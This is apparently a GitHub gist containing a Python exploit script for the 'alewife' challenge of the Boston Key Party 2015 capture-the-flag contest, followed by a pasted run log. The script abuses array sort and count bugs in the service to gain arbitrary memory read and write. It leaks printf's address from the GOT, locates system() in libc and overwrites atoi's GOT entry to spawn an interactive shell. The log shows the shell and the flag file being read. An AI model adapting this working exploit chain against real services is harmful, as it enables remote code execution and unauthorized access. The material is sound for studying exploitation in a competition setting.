Last active
August 29, 2015 14:16
-
-
Save g05u/4126f452ee41d4d5328c to your computer and use it in GitHub Desktop.
Boston ctf party alewife writeup/exploit
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| import struct, sys, time | |
| from nulllife import * | |
| import ast | |
| # @_g05u_ | |
| #boston ctf party 2015 | |
| # exploit alewife chall | |
| # www.null-life.com | |
| def init(s): | |
| s.readuntil(': ') | |
| s.write('1') | |
| s.readuntil('-: ') | |
| s.write('1') | |
| s.readuntil(': ') | |
| s.write('1') | |
| s.readuntil('-: ') | |
| s.write('5') | |
| s.readuntil('--: ') | |
| s.write('0') | |
| s.readuntil('--: ') | |
| s.write('2') | |
| return s.readline() | |
| def _h(s): | |
| s.readuntil(': ') | |
| s.write('2') | |
| s.readuntil('-: ') | |
| s.write('2') | |
| s.readuntil('--: ') | |
| s.write('0') | |
| s.readuntil('i: ') | |
| def add_items_qword_array(s, data): | |
| _h(s) | |
| s.write('1') | |
| s.readuntil('ii: ') | |
| s.write(str(len(data))) | |
| i = 0 | |
| for n in data: | |
| s.readuntil('iii: ') | |
| #print i | |
| i += 1 | |
| s.write(str(n)) | |
| return s.readline() | |
| def sort_qwords_array(s): | |
| _h(s) | |
| s.write('3') | |
| return s.readline() | |
| def dec_count_qwords_array(s): | |
| _h(s) | |
| s.write('4') | |
| return s.readline() | |
| def print_qwords_array(s, index = '0'): | |
| s.readuntil(': ') | |
| s.write('2') | |
| s.readuntil('-: ') | |
| s.write('4') | |
| s.readuntil('--: ') | |
| s.write(index) | |
| return s.readuntil(']') | |
| def clear_qwords_array(s): | |
| s.readuntil(': ') | |
| s.write('2') | |
| s.readuntil('-: ') | |
| s.write('3') | |
| s.readuntil('--: ') | |
| s.write('0') | |
| s.readuntil(': ') | |
| s.write('2') | |
| s.readuntil('-: ') | |
| s.write('3') | |
| s.readuntil('--: ') | |
| s.write('1') | |
| s.readuntil(': ') | |
| s.write('1') | |
| s.readuntil('-: ') | |
| s.write('5') | |
| s.readuntil('--: ') | |
| s.write('0') | |
| s.readuntil('--: ') | |
| s.write('2') | |
| s.readuntil(': ') | |
| s.write('1') | |
| s.readuntil('-: ') | |
| s.write('5') | |
| s.readuntil('--: ') | |
| s.write('0') | |
| s.readuntil('--: ') | |
| s.write('2') | |
| return s.readline() | |
| #read 2kb data | |
| def read_arbitrary(s, addr): | |
| items = [6828496] * 0x100 # 0x6831C0 (qword_struct_array) | |
| add_items_qword_array(s, items) | |
| sort_qwords_array(s) | |
| dec_count_qwords_array(s) | |
| add_items_qword_array(s, [addr]) | |
| return ast.literal_eval(print_qwords_array(s).replace(' ', '').replace('\n', '')) | |
| def _read_arbitrary(s, addr, size): | |
| items = [6830592] * 0x100 # 0x6831C0 (qword_struct_array) | |
| add_items_qword_array(s, items) | |
| sort_qwords_array(s) | |
| dec_count_qwords_array(s) | |
| dec_count_qwords_array(s) | |
| add_items_qword_array(s, [addr, size]) | |
| return ast.literal_eval(print_qwords_array(s, index='1').replace(' ', '').replace('\n', '')) | |
| def write_arbitrary(s, addr, val): | |
| items = [6828504] * 0x100 # 0x6831C0 (qword_struct_array) | |
| add_items_qword_array(s, items) | |
| sort_qwords_array(s) | |
| dec_count_qwords_array(s) | |
| dec_count_qwords_array(s) | |
| return add_items_qword_array(s, [addr - 0xFF * 8, val]) | |
| #bruteforce offset to libc_base | |
| def get_offset(s, addr): | |
| i = 1 | |
| while True: | |
| clear_qwords_array(s) | |
| offset = (addr & 0xFFF) + 0x1000 * i | |
| print '[!] Try offset: 0x%08x' % offset | |
| res = struct.pack('<Q', read_arbitrary(s, addr - offset)[0]) | |
| if '\x7FELF' in res: | |
| print '[+] Offset to libc_base from printf: 0x%08x' % offset | |
| return offset | |
| i += 1 | |
| return -1 | |
| def dump_libc(s, libc_base): | |
| libc_data = '' | |
| print '[+] Dumping libc_base.. ' | |
| f = open('libc_dump_new2.bin', 'wb') | |
| clear_qwords_array(s) | |
| res = _read_arbitrary(s, libc_base, 0x100 * 700) #read 1.4mb | |
| line = ''.join(map(lambda x: struct.pack('<Q', x), res)) | |
| f.write(line) | |
| f.close() | |
| print '[+] libc dump saved...' | |
| printf_got = 0x602DD0 | |
| atoi_got = 0x602E28 | |
| s = NullSocket('alewife.bostonkey.party', 8888) | |
| #s = NullSocket('192.168.169.132', 7777) | |
| init(s) | |
| print '[+] Reading printf got...' | |
| printf_addr = read_arbitrary(s, printf_got)[0] | |
| print '[+] Printf address: 0x%016x' % printf_addr | |
| print '[+] Getting offset from printf to libc_base...' | |
| #offset_printf = get_offset(s, printf_addr) | |
| offset_printf = 0x00054400 | |
| print '[+] Offset to libc base: 0x%016x' % offset_printf | |
| libc_base = printf_addr - offset_printf | |
| print '[+] libc base: 0x%016x' % libc_base | |
| #dump_libc(s, libc_base) | |
| system_addr = libc_base + 0x00046640 #from libc dumped | |
| print '[+] System addres: 0x%016x' % system_addr | |
| clear_qwords_array(s) | |
| print '[+] overwrite atoi_got...' | |
| write_arbitrary(s, atoi_got, system_addr) | |
| print '[+] Got shell...' | |
| s.write('/bin/sh -i;\x00') | |
| s.interactive() | |
| ''' | |
| $ python xpl_array.py | |
| [+] Reading printf got... | |
| [+] Printf address: 0x00007fb618746400 | |
| [+] Getting offset from printf to libc_base... | |
| [+] Offset to libc base: 0x0000000000054400 | |
| [+] libc base: 0x00007fb6186f2000 | |
| [+] System addres: 0x00007fb618738640 | |
| [+] overwrite atoi_got... | |
| [+] Got shell... | |
| : /bin/sh: 0: can't access tty; job control turned off | |
| $ id | |
| uid=1001(array) gid=1001(array) groups=1001(array) | |
| $ ls -la | |
| total 92 | |
| drwxr-xr-x 22 root root 4096 Feb 27 18:43 . | |
| drwxr-xr-x 22 root root 4096 Feb 27 18:43 .. | |
| drwxr-xr-x 2 root root 4096 Feb 27 18:43 bin | |
| drwxr-xr-x 3 root root 4096 Feb 27 18:44 boot | |
| drwxr-xr-x 13 root root 4000 Feb 27 18:44 dev | |
| drwxr-xr-x 90 root root 4096 Feb 27 18:44 etc | |
| drwxr-xr-x 4 root root 4096 Feb 27 18:25 home | |
| lrwxrwxrwx 1 root root 33 Feb 27 18:43 initrd.img -> boot/initrd.img-3.13.0-46-generic | |
| lrwxrwxrwx 1 root root 33 Jan 23 00:41 initrd.img.old -> boot/initrd.img-3.13.0-44-generic | |
| drwxr-xr-x 21 root root 4096 Jan 23 00:40 lib | |
| drwxr-xr-x 2 root root 4096 Feb 27 18:43 lib64 | |
| drwx------ 2 root root 16384 Jan 23 00:42 lost+found | |
| drwxr-xr-x 2 root root 4096 Jan 23 00:39 media | |
| drwxr-xr-x 3 root root 4096 Jan 30 23:39 mnt | |
| drwxr-xr-x 2 root root 4096 Jan 23 00:39 opt | |
| dr-xr-xr-x 155 root root 0 Feb 27 18:16 proc | |
| drwx------ 3 root root 4096 Feb 27 18:49 root | |
| drwxr-xr-x 19 root root 740 Feb 28 07:37 run | |
| drwxr-xr-x 2 root root 12288 Feb 27 18:43 sbin | |
| drwxr-xr-x 2 root root 4096 Jan 23 00:39 srv | |
| dr-xr-xr-x 13 root root 0 Feb 27 18:16 sys | |
| drwx-wx-wt 2 root root 4096 Feb 28 18:17 tmp | |
| drwxr-xr-x 10 root root 4096 Jan 23 00:39 usr | |
| drwxr-xr-x 12 root root 4096 Jan 23 00:42 var | |
| lrwxrwxrwx 1 root root 30 Feb 27 18:43 vmlinuz -> boot/vmlinuz-3.13.0-46-generic | |
| lrwxrwxrwx 1 root root 30 Jan 23 00:41 vmlinuz.old -> boot/vmlinuz-3.13.0-44-generic | |
| $ ls -la /home | |
| total 16 | |
| drwxr-xr-x 4 root root 4096 Feb 27 18:25 . | |
| drwxr-xr-x 22 root root 4096 Feb 27 18:43 .. | |
| drwxr-xr-x 2 root root 4096 Feb 27 18:40 array | |
| drwx------ 4 ubuntu ubuntu 4096 Feb 27 22:30 ubuntu | |
| $ ls -la /home/array | |
| total 40 | |
| drwxr-xr-x 2 root root 4096 Feb 27 18:40 . | |
| drwxr-xr-x 4 root root 4096 Feb 27 18:25 .. | |
| -rwxr-sr-x 1 root array 13928 Feb 27 18:35 array | |
| -rw-r--r-- 1 root root 220 Feb 27 18:25 .bash_logout | |
| -rw-r--r-- 1 root root 3637 Feb 27 18:25 .bashrc | |
| -r--r----- 1 root array 27 Feb 27 18:40 flag | |
| -rw-r--r-- 1 root root 675 Feb 27 18:25 .profile | |
| $ cat /home/array/flag | |
| Because_C++_is_t00_hard!!! | |
| ''' |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment